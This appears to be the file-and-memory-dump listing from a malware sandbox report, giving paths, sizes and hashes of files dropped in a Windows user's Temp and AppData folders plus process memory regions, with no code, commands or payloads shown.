C:\Users\Admin\AppData\Local\Temp\Parilicium.txt

Filesize
6KB

MD5
2632b1daa8277e83ca6e0bf89bd94d3e

SHA1
7d3507c8d9ee91a0b1f8174ff03c5a614228f4fd

SHA256
b9039fa8099e8c07d2fa74788fff0ae4438ab9ded91fc06fc1b988319567fe24

SHA512
afeb48066e5f267f8410a199f86d84d003d6f9cc3939ac556f7b2ab980bf6ea97cbce8a3e16d3039d02dc1c7e11542188c8b8c2865de5d8ca4bf46f8af2ab5bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Parilicium.txt

Filesize
153B

MD5
77646fd12a6f8467c7807fcdf2f4d7d9

SHA1
46e0f8a46f01fd486cc239bf7f96f923e6b57946

SHA256
a35c7d762434bae7e29d18907bf4afe125c0c78883671eccc024340eb2ce9c3a

SHA512
156143a7d8396fcbe25d079fb0d9ca205f76d0d14bf643cfb08fd912eb45705244a97b1defd573aa4c5ecd5355dcbf749c0594b853aceb6822ffac3796170151

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_skzcpfv1.kwp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Udenbordsmotor.Vej

Filesize
477KB

MD5
c67dd10ffaa9c4875bae268954df1ad8

SHA1
b15d50cb08e2b54b5447a5617206b31cd29cf60c

SHA256
57dfe1a732602510c7a18c2c269e70219d5734c288f67bac8d83f9fe670074ca

SHA512
ac7aff6c65d541b1504e4f5e1f94c95e202bdc6bdfdfb447c0eff2d554a41fed6d0895c427e5c2b8f1c4a12c2f26f0091a20ac623bd906930da868da2670ec4b

Download Submit
memory/1788-344-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1788-343-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1788-338-0x000001AEE7750000-0x000001AEE7772000-memory.dmp

Filesize
136KB

Download
memory/1788-390-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1788-372-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1788-371-0x00007FFB52013000-0x00007FFB52015000-memory.dmp

Filesize
8KB

Download
memory/1788-332-0x00007FFB52013000-0x00007FFB52015000-memory.dmp

Filesize
8KB

Download
memory/3080-351-0x0000000005560000-0x00000000055C6000-memory.dmp

Filesize
408KB

Download
memory/3080-350-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/3080-362-0x0000000005B80000-0x0000000005B9E000-memory.dmp

Filesize
120KB

Download
memory/3080-363-0x0000000005BC0000-0x0000000005C0C000-memory.dmp

Filesize
304KB

Download
memory/3080-364-0x0000000007310000-0x000000000798A000-memory.dmp

Filesize
6.5MB

Download
memory/3080-365-0x0000000006CD0000-0x0000000006CEA000-memory.dmp

Filesize
104KB

Download
memory/3080-366-0x0000000006E80000-0x0000000006F16000-memory.dmp

Filesize
600KB

Download
memory/3080-367-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/3080-368-0x0000000007F40000-0x00000000084E4000-memory.dmp

Filesize
5.6MB

Download
memory/3080-361-0x00000000055D0000-0x0000000005924000-memory.dmp

Filesize
3.3MB

Download
memory/3080-370-0x00000000084F0000-0x000000000B819000-memory.dmp

Filesize
51.2MB

Download
memory/3080-349-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

Filesize
136KB

Download
memory/3080-348-0x0000000004EC0000-0x00000000054E8000-memory.dmp

Filesize
6.2MB

Download
memory/3080-347-0x0000000002250000-0x0000000002286000-memory.dmp

Filesize
216KB

Download
memory/4868-386-0x0000000000C00000-0x0000000001E54000-memory.dmp

Filesize
18.3MB

Download
memory/4868-387-0x0000000000C00000-0x0000000000C42000-memory.dmp

Filesize
264KB

Download
memory/4868-394-0x0000000023E40000-0x0000000023E90000-memory.dmp

Filesize
320KB

Download
memory/4868-395-0x0000000023F30000-0x0000000023FC2000-memory.dmp

Filesize
584KB

Download
memory/4868-396-0x0000000023860000-0x000000002386A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads